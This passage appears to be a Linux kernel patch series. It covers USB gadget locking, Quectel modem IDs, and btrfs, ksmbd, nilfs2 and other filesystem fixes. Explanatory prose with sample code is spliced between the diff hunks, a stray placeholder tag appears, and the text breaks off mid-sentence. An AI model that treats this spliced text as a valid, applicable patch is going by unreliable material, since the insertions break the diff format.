+-		usb_gadget_connect(udc->gadget);
++		usb_gadget_connect_locked(udc->gadget);
+ 	else
+-		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_disconnect_locked(udc->gadget);
++}
++
++static void vbus_event_work(struct work_struct *work)
++{
++	struct usb_udc *udc = container_of(work, struct usb_udc, vbus_work);
++
++	mutex_lock(&udc->connect_lock);
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ }
+ 
+ /**
+@@ -1067,6 +1119,14 @@ static void usb_udc_connect_control(struct usb_udc *udc)
+  *
+  * The udc driver calls it when it wants to connect or disconnect gadget
+  * according to vbus status.
++ *
++ * This function can be invoked from interrupt context by irq handlers of
++ * the gadget drivers, however, usb_udc_connect_control() has to run in
++ * non-atomic context due to the following:
++ * a. Some of the gadget driver implementations expect the ->pullup
++ * callback to be invoked in non-atomic context.
++ * b. usb_gadget_disconnect() acquires udc_lock which is a mutex.
++ * Hence offload invocation of usb_udc_connect_control() to workqueue.
+  */
+ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+@@ -1074,7 +1134,7 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ 
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control(udc);
++		schedule_work(&udc->vbus_work);
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+@@ -1097,7 +1157,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start - tells usb device controller to start up
++ * usb_gadget_udc_start_locked - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1108,8 +1168,11 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
++ *
++ * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start(struct usb_udc *udc)
++static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	int ret;
+ 
+@@ -1126,7 +1189,7 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1135,8 +1198,11 @@ static inline int usb_gadget_udc_start(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
++ *
++ * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop(struct usb_udc *udc)
++static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
++	__must_hold(&udc->connect_lock)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1295,12 +1361,14 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
++	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+ 	mutex_lock(&udc_lock);
+ 	list_add_tail(&udc->list, &udc_list);
+ 	mutex_unlock(&udc_lock);
++	INIT_WORK(&udc->vbus_work, vbus_event_work);
+ 
+ 	ret = device_add(&udc->dev);
+ 	if (ret)
+@@ -1432,6 +1500,7 @@ void usb_del_gadget(struct usb_gadget *gadget)
+ 	flush_work(&gadget->work);
+ 	device_del(&gadget->dev);
+ 	ida_free(&gadget_id_numbers, gadget->id_number);
++	cancel_work_sync(&udc->vbus_work);
+ 	device_unregister(&udc->dev);
+ }
+ EXPORT_SYMBOL_GPL(usb_del_gadget);
+@@ -1496,11 +1565,16 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	ret = usb_gadget_udc_start(udc);
+-	if (ret)
++	mutex_lock(&udc->connect_lock);
++	ret = usb_gadget_udc_start_locked(udc);
++	if (ret) {
++		mutex_unlock(&udc->connect_lock);
+ 		goto err_start;
++	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control(udc);
++	udc->allow_connect = true;
++	usb_udc_connect_control_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1531,12 +1605,16 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	usb_gadget_disconnect(gadget);
++	udc->allow_connect = false;
++	cancel_work_sync(&udc->vbus_work);
++	mutex_lock(&udc->connect_lock);
++	usb_gadget_disconnect_locked(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop(udc);
++	usb_gadget_udc_stop_locked(udc);
++	mutex_unlock(&udc->connect_lock);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1622,11 +1700,15 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		usb_gadget_udc_start(udc);
+-		usb_gadget_connect(udc->gadget);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_udc_start_locked(udc);
++		usb_gadget_connect_locked(udc->gadget);
++		mutex_unlock(&udc->connect_lock);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		usb_gadget_disconnect(udc->gadget);
+-		usb_gadget_udc_stop(udc);
++		mutex_lock(&udc->connect_lock);
++		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_udc_stop_locked(udc);
++		mutex_unlock(&udc->connect_lock);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
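
The UDC rework above hinges on one rule: usb_udc_vbus_handler() may be
called from an interrupt handler, but connecting or disconnecting the
pullup can sleep (connect_lock is a mutex, and some ->pullup
implementations expect non-atomic context), so the real work is
deferred. A hedged, self-contained sketch of that offload pattern with
illustrative names:

#include <linux/interrupt.h>
#include <linux/mutex.h>
#include <linux/workqueue.h>

struct example_udc {
	bool vbus;
	struct mutex connect_lock;
	struct work_struct vbus_work;
};

static void example_vbus_work(struct work_struct *work)
{
	struct example_udc *udc = container_of(work, struct example_udc,
					       vbus_work);

	mutex_lock(&udc->connect_lock);
	/* connect or disconnect according to udc->vbus; may sleep here */
	mutex_unlock(&udc->connect_lock);
}

static irqreturn_t example_vbus_irq(int irq, void *dev_id)
{
	struct example_udc *udc = dev_id;

	udc->vbus = true;		/* a real driver reads this from hardware */
	schedule_work(&udc->vbus_work);	/* never sleep in IRQ context */
	return IRQ_HANDLED;
}

</grinsert_placeholder>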
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f05aea57e2d88..e12fec4c2e2f2 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -248,6 +248,8 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_VENDOR_ID			0x2c7c
+ /* These Quectel products use Quectel's vendor ID */
+ #define QUECTEL_PRODUCT_EC21			0x0121
++#define QUECTEL_PRODUCT_EM061K_LTA		0x0123
++#define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+@@ -266,6 +268,8 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+ #define QUECTEL_PRODUCT_EC200U			0x0901
+ #define QUECTEL_PRODUCT_EC200S_CN		0x6002
++#define QUECTEL_PRODUCT_EM061K_LWW		0x6008
++#define QUECTEL_PRODUCT_EM061K_LCN		0x6009
+ #define QUECTEL_PRODUCT_EC200T			0x6026
+ #define QUECTEL_PRODUCT_RM500K			0x7001
+ 
+@@ -1189,6 +1193,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LMS, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LTA, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LWW, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM12, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(1) | RSVD(2) | RSVD(3) | RSVD(4) | NUMEP2 },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM12, 0xff, 0, 0) },
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index b5ab26422c349..fd2477161e451 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -89,7 +89,7 @@ peak_current_show(struct device *dev, struct device_attribute *attr, char *buf)
+ static ssize_t
+ fast_role_swap_current_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
+-	return sysfs_emit(buf, "%u\n", to_pdo(dev)->pdo >> PDO_FIXED_FRS_CURR_SHIFT) & 3;
++	return sysfs_emit(buf, "%u\n", (to_pdo(dev)->pdo >> PDO_FIXED_FRS_CURR_SHIFT) & 3);
+ }
+ static DEVICE_ATTR_RO(fast_role_swap_current);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 086b509689839..47a2c73df3420 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -132,10 +132,8 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (cci & UCSI_CCI_BUSY) {
+-		ucsi->ops->async_write(ucsi, UCSI_CANCEL, NULL, 0);
+-		return -EBUSY;
+-	}
++	if (cmd != UCSI_CANCEL && cci & UCSI_CCI_BUSY)
++		return ucsi_exec_command(ucsi, UCSI_CANCEL);
+ 
+ 	if (!(cci & UCSI_CCI_COMMAND_COMPLETE))
+ 		return -EIO;
+@@ -149,6 +147,11 @@ static int ucsi_exec_command(struct ucsi *ucsi, u64 cmd)
+ 		return ucsi_read_error(ucsi);
+ 	}
+ 
++	if (cmd == UCSI_CANCEL && cci & UCSI_CCI_CANCEL_COMPLETE) {
++		ret = ucsi_acknowledge_command(ucsi);
++		return ret ? ret : -EBUSY;
++	}
++
+ 	return UCSI_CCI_LENGTH(cci);
+ }
+ 
+diff --git a/fs/afs/vl_probe.c b/fs/afs/vl_probe.c
+index d1c7068b4346f..58452b86e6727 100644
+--- a/fs/afs/vl_probe.c
++++ b/fs/afs/vl_probe.c
+@@ -115,8 +115,8 @@ responded:
+ 		}
+ 	}
+ 
+-	if (rxrpc_kernel_get_srtt(call->net->socket, call->rxcall, &rtt_us) &&
+-	    rtt_us < server->probe.rtt) {
++	rxrpc_kernel_get_srtt(call->net->socket, call->rxcall, &rtt_us);
++	if (rtt_us < server->probe.rtt) {
+ 		server->probe.rtt = rtt_us;
+ 		server->rtt = rtt_us;
+ 		alist->preferred = index;
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index f33ddd5922b8c..74a5c94898b0f 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -2621,10 +2621,20 @@ int btrfs_inc_block_group_ro(struct btrfs_block_group *cache,
+ 	}
+ 
+ 	ret = inc_block_group_ro(cache, 0);
+-	if (!do_chunk_alloc || ret == -ETXTBSY)
+-		goto unlock_out;
+ 	if (!ret)
+ 		goto out;
++	if (ret == -ETXTBSY)
++		goto unlock_out;
++
++	/*
++	 * Skip chunk allocation if the bg is SYSTEM, this is to avoid system
++	 * chunk allocation storm to exhaust the system chunk array.  Otherwise
++	 * we still want to try our best to mark the block group read-only.
++	 */
++	if (!do_chunk_alloc && ret == -ENOSPC &&
++	    (cache->flags & BTRFS_BLOCK_GROUP_SYSTEM))
++		goto unlock_out;
++
+ 	alloc_flags = btrfs_get_alloc_profile(fs_info, cache->space_info->flags);
+ 	ret = btrfs_chunk_alloc(trans, alloc_flags, CHUNK_ALLOC_FORCE);
+ 	if (ret < 0)
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index ca69a46f10065..f22e00dfec6c4 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1098,13 +1098,18 @@ int btrfs_global_root_insert(struct btrfs_root *root)
+ {
+ 	struct btrfs_fs_info *fs_info = root->fs_info;
+ 	struct rb_node *tmp;
++	int ret = 0;
+ 
+ 	write_lock(&fs_info->global_root_lock);
+ 	tmp = rb_find_add(&root->rb_node, &fs_info->global_root_tree, global_root_cmp);
+ 	write_unlock(&fs_info->global_root_lock);
+-	ASSERT(!tmp);
+ 
+-	return tmp ? -EEXIST : 0;
++	if (tmp) {
++		ret = -EEXIST;
++		btrfs_warn(fs_info, "global root %llu %llu already exists",
++				root->root_key.objectid, root->root_key.offset);
++	}
++	return ret;
+ }
+ 
+ void btrfs_global_root_delete(struct btrfs_root *root)
+@@ -2934,6 +2939,7 @@ static int __cold init_tree_roots(struct btrfs_fs_info *fs_info)
+ 			/* We can't trust the free space cache either */
+ 			btrfs_set_opt(fs_info->mount_opt, CLEAR_CACHE);
+ 
++			btrfs_warn(fs_info, "try to load backup roots slot %d", i);
+ 			ret = read_backup_root(fs_info, i);
+ 			backup_index = ret;
+ 			if (ret < 0)
+diff --git a/fs/btrfs/file-item.c b/fs/btrfs/file-item.c
+index 4fab7da632594..b14d2da9b26d3 100644
+--- a/fs/btrfs/file-item.c
++++ b/fs/btrfs/file-item.c
+@@ -717,7 +717,9 @@ blk_status_t btrfs_csum_one_bio(struct btrfs_inode *inode, struct bio *bio,
+ 				sums = kvzalloc(btrfs_ordered_sum_size(fs_info,
+ 						      bytes_left), GFP_KERNEL);
+ 				memalloc_nofs_restore(nofs_flag);
+-				BUG_ON(!sums); /* -ENOMEM */
++				if (!sums)
++					return BLK_STS_RESOURCE;
++
+ 				sums->len = bytes_left;
+ 				ordered = btrfs_lookup_ordered_extent(inode,
+ 								offset);
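
The csum change above replaces a BUG_ON() on allocation failure with a
proper error return; running out of memory is an expected condition,
not a kernel bug. A minimal sketch of the shape, with illustrative
names around the real kvzalloc()/BLK_STS_RESOURCE:

	sums = kvzalloc(size, GFP_KERNEL);
	if (!sums)
		return BLK_STS_RESOURCE;	/* was: BUG_ON(!sums) */
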
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 56e9efbffd58e..c5583fc2a5855 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -1849,7 +1849,7 @@ static int can_nocow_file_extent(struct btrfs_path *path,
+ 
+ 	ret = btrfs_cross_ref_exist(root, btrfs_ino(inode),
+ 				    key->offset - args->extent_offset,
+-				    args->disk_bytenr, false, path);
++				    args->disk_bytenr, args->strict, path);
+ 	WARN_ON_ONCE(ret > 0 && is_freespace_inode);
+ 	if (ret != 0)
+ 		goto out;
+@@ -7387,7 +7387,7 @@ static struct extent_map *create_io_em(struct btrfs_inode *inode, u64 start,
+ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 					 struct inode *inode,
+ 					 struct btrfs_dio_data *dio_data,
+-					 u64 start, u64 len,
++					 u64 start, u64 *lenp,
+ 					 unsigned int iomap_flags)
+ {
+ 	const bool nowait = (iomap_flags & IOMAP_NOWAIT);
+@@ -7398,6 +7398,7 @@ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 	struct btrfs_block_group *bg;
+ 	bool can_nocow = false;
+ 	bool space_reserved = false;
++	u64 len = *lenp;
+ 	u64 prev_len;
+ 	int ret = 0;
+ 
+@@ -7468,15 +7469,19 @@ static int btrfs_get_blocks_direct_write(struct extent_map **map,
+ 		free_extent_map(em);
+ 		*map = NULL;
+ 
+-		if (nowait)
+-			return -EAGAIN;
++		if (nowait) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/*
+ 		 * If we could not allocate data space before locking the file
+ 		 * range and we can't do a NOCOW write, then we have to fail.
+ 		 */
+-		if (!dio_data->data_space_reserved)
+-			return -ENOSPC;
++		if (!dio_data->data_space_reserved) {
++			ret = -ENOSPC;
++			goto out;
++		}
+ 
+ 		/*
+ 		 * We have to COW and we have already reserved data space before,
+@@ -7517,6 +7522,7 @@ out:
+ 		btrfs_delalloc_release_extents(BTRFS_I(inode), len);
+ 		btrfs_delalloc_release_metadata(BTRFS_I(inode), len, true);
+ 	}
++	*lenp = len;
+ 	return ret;
+ }
+ 
+@@ -7693,7 +7699,7 @@ static int btrfs_dio_iomap_begin(struct inode *inode, loff_t start,
+ 
+ 	if (write) {
+ 		ret = btrfs_get_blocks_direct_write(&em, inode, dio_data,
+-						    start, len, flags);
++						    start, &len, flags);
+ 		if (ret < 0)
+ 			goto unlock_err;
+ 		unlock_extents = true;
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index c5d8dc112fd58..1672d4846baaf 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -4017,13 +4017,20 @@ int scrub_enumerate_chunks(struct scrub_ctx *sctx,
+ 
+ 		if (ret == 0) {
+ 			ro_set = 1;
+-		} else if (ret == -ENOSPC && !sctx->is_dev_replace) {
++		} else if (ret == -ENOSPC && !sctx->is_dev_replace &&
++			   !(cache->flags & BTRFS_BLOCK_GROUP_RAID56_MASK)) {
+ 			/*
+ 			 * btrfs_inc_block_group_ro return -ENOSPC when it
+ 			 * failed in creating new chunk for metadata.
+ 			 * It is not a problem for scrub, because
+ 			 * metadata are always cowed, and our scrub paused
+ 			 * commit_transactions.
++			 *
++			 * For RAID56 chunks, we have to mark them read-only
++			 * for scrub, as later we would use our own cache
++			 * out of RAID56 realm.
++			 * Thus we want the RAID56 bg to be marked RO to
++	 * prevent RMW from screwing up our cache.
+ 			 */
+ 			ro_set = 0;
+ 		} else if (ret == -ETXTBSY) {
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 9a4c33ffb75fa..87dcffece7623 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5146,9 +5146,13 @@ oplock_break_ack:
+ 	 * disconnected since oplock already released by the server
+ 	 */
+ 	if (!oplock_break_cancelled) {
+-		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++		/* check for server null since can race with kill_sb calling tree disconnect */
++		if (tcon->ses && tcon->ses->server) {
++			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+ 				volatile_fid, net_fid, cinode);
+-		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
++		} else
++			pr_warn_once("lease break not sent for unmounted share\n");
+ 	}
+ 
+ 	cifs_done_oplock_break(cinode);
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index 64659b1109733..eccecd3fac90c 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -1760,7 +1760,11 @@ static int ep_autoremove_wake_function(struct wait_queue_entry *wq_entry,
+ {
+ 	int ret = default_wake_function(wq_entry, mode, sync, key);
+ 
+-	list_del_init(&wq_entry->entry);
++	/*
++	 * Pairs with list_empty_careful in ep_poll, and ensures future loop
++	 * iterations see the cause of this wakeup.
++	 */
++	list_del_init_careful(&wq_entry->entry);
+ 	return ret;
+ }
+ 
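
The list_del_init_careful() above pairs with a lockless
list_empty_careful() check on the sleeping side: the "careful" variants
add the ordering needed so that a waiter which observes its entry gone
from the wait queue also observes the event written before the wakeup.
A hedged sketch of the consumer half (the epoll code's actual loop is
more involved):

#include <linux/list.h>
#include <linux/wait.h>

/* Safe without the wait-queue lock only because the waker used
 * list_del_init_careful(); a plain list_empty() could be reordered
 * ahead of the writes that caused the wakeup.
 */
static bool example_was_detached(struct wait_queue_entry *wq_entry)
{
	return list_empty_careful(&wq_entry->entry);
}
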
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index a38aa33af08ef..8e83b51e3c68a 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -322,17 +322,15 @@ static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
+ struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
+ 					    ext4_group_t group)
+ {
+-	 struct ext4_group_info **grp_info;
+-	 long indexv, indexh;
+-
+-	 if (unlikely(group >= EXT4_SB(sb)->s_groups_count)) {
+-		 ext4_error(sb, "invalid group %u", group);
+-		 return NULL;
+-	 }
+-	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
+-	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
+-	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
+-	 return grp_info[indexh];
++	struct ext4_group_info **grp_info;
++	long indexv, indexh;
++
++	if (unlikely(group >= EXT4_SB(sb)->s_groups_count))
++		return NULL;
++	indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
++	indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
++	grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
++	return grp_info[indexh];
+ }
+ 
+ /*
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index bf8531b80a182..e1d2be19cddfa 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -366,8 +366,6 @@ int ksmbd_conn_handler_loop(void *p)
+ 			break;
+ 
+ 		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+-		if (!ksmbd_smb_request(conn))
+-			break;
+ 
+ 		/*
+ 		 * We already read 4 bytes to find out PDU size, now
+@@ -385,6 +383,9 @@ int ksmbd_conn_handler_loop(void *p)
+ 			continue;
+ 		}
+ 
++		if (!ksmbd_smb_request(conn))
++			break;
++
+ 		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
+ 		    SMB2_PROTO_NUMBER) {
+ 			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 95afb6b23a91c..05d7f3e910bf4 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -158,7 +158,19 @@ int ksmbd_verify_smb_message(struct ksmbd_work *work)
+  */
+ bool ksmbd_smb_request(struct ksmbd_conn *conn)
+ {
+-	return conn->request_buf[0] == 0;
++	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++
++	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
++		pr_err_ratelimited("smb2 compression not support yet");
++		return false;
++	}
++
++	if (*proto != SMB1_PROTO_NUMBER &&
++	    *proto != SMB2_PROTO_NUMBER &&
++	    *proto != SMB2_TRANSFORM_PROTO_NUM)
++		return false;
++
++	return true;
+ }
+ 
+ static bool supported_protocol(int idx)
+diff --git a/fs/nilfs2/btnode.c b/fs/nilfs2/btnode.c
+index e74fda212620b..ee2cde07264bb 100644
+--- a/fs/nilfs2/btnode.c
++++ b/fs/nilfs2/btnode.c
+@@ -285,6 +285,14 @@ void nilfs_btnode_abort_change_key(struct address_space *btnc,
+ 	if (nbh == NULL) {	/* blocksize == pagesize */
+ 		xa_erase_irq(&btnc->i_pages, newkey);
+ 		unlock_page(ctxt->bh->b_page);
+-	} else
+-		brelse(nbh);
++	} else {
++		/*
++		 * When canceling a buffer that a prepare operation has
++		 * allocated to copy a node block to another location, use
++		 * nilfs_btnode_delete() to initialize and release the buffer
++		 * so that the buffer flags will not be in an inconsistent
++		 * state when it is reallocated.
++		 */
++		nilfs_btnode_delete(nbh);
++	}
+ }
+diff --git a/fs/nilfs2/sufile.c b/fs/nilfs2/sufile.c
+index dc359b56fdfac..2c6078a6b8ecb 100644
+--- a/fs/nilfs2/sufile.c
++++ b/fs/nilfs2/sufile.c
+@@ -779,6 +779,15 @@ int nilfs_sufile_resize(struct inode *sufile, __u64 newnsegs)
+ 			goto out_header;
+ 
+ 		sui->ncleansegs -= nsegs - newnsegs;
++
++		/*
++		 * If the sufile is successfully truncated, immediately adjust
++		 * the segment allocation space while locking the semaphore
++		 * "mi_sem" so that nilfs_sufile_alloc() never allocates
++		 * segments in the truncated space.
++		 */
++		sui->allocmax = newnsegs - 1;
++		sui->allocmin = 0;
+ 	}
+ 
+ 	kaddr = kmap_atomic(header_bh->b_page);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 2894152a6b25c..0f0667957c810 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -405,6 +405,18 @@ unsigned long nilfs_nrsvsegs(struct the_nilfs *nilfs, unsigned long nsegs)
+ 				  100));
+ }
+ 
++/**
++ * nilfs_max_segment_count - calculate the maximum number of segments
++ * @nilfs: nilfs object
++ */
++static u64 nilfs_max_segment_count(struct the_nilfs *nilfs)
++{
++	u64 max_count = U64_MAX;
++
++	do_div(max_count, nilfs->ns_blocks_per_segment);
++	return min_t(u64, max_count, ULONG_MAX);
++}
++
+ void nilfs_set_nsegments(struct the_nilfs *nilfs, unsigned long nsegs)
+ {
+ 	nilfs->ns_nsegments = nsegs;
+@@ -414,6 +426,8 @@ void nilfs_set_nsegments(struct the_nilfs *nilfs, unsigned long nsegs)
+ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 				   struct nilfs_super_block *sbp)
+ {
++	u64 nsegments, nblocks;
++
+ 	if (le32_to_cpu(sbp->s_rev_level) < NILFS_MIN_SUPP_REV) {
+ 		nilfs_err(nilfs->ns_sb,
+ 			  "unsupported revision (superblock rev.=%d.%d, current rev.=%d.%d). Please check the version of mkfs.nilfs(2).",
+@@ -457,7 +471,34 @@ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 		return -EINVAL;
+ 	}
+ 
+-	nilfs_set_nsegments(nilfs, le64_to_cpu(sbp->s_nsegments));
++	nsegments = le64_to_cpu(sbp->s_nsegments);
++	if (nsegments > nilfs_max_segment_count(nilfs)) {
++		nilfs_err(nilfs->ns_sb,
++			  "segment count %llu exceeds upper limit (%llu segments)",
++			  (unsigned long long)nsegments,
++			  (unsigned long long)nilfs_max_segment_count(nilfs));
++		return -EINVAL;
++	}
++
++	nblocks = sb_bdev_nr_blocks(nilfs->ns_sb);
++	if (nblocks) {
++		u64 min_block_count = nsegments * nilfs->ns_blocks_per_segment;
++		/*
++		 * To avoid failing to mount early device images without a
++		 * second superblock, exclude that block count from the
++		 * "min_block_count" calculation.
++		 */
++
++		if (nblocks < min_block_count) {
++			nilfs_err(nilfs->ns_sb,
++				  "total number of segment blocks %llu exceeds device size (%llu blocks)",
++				  (unsigned long long)min_block_count,
++				  (unsigned long long)nblocks);
++			return -EINVAL;
++		}
++	}
++
++	nilfs_set_nsegments(nilfs, nsegments);
+ 	nilfs->ns_crc_seed = le32_to_cpu(sbp->s_crc_seed);
+ 	return 0;
+ }
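
A worked example of the new bounds, assuming 4 KiB blocks and 2048
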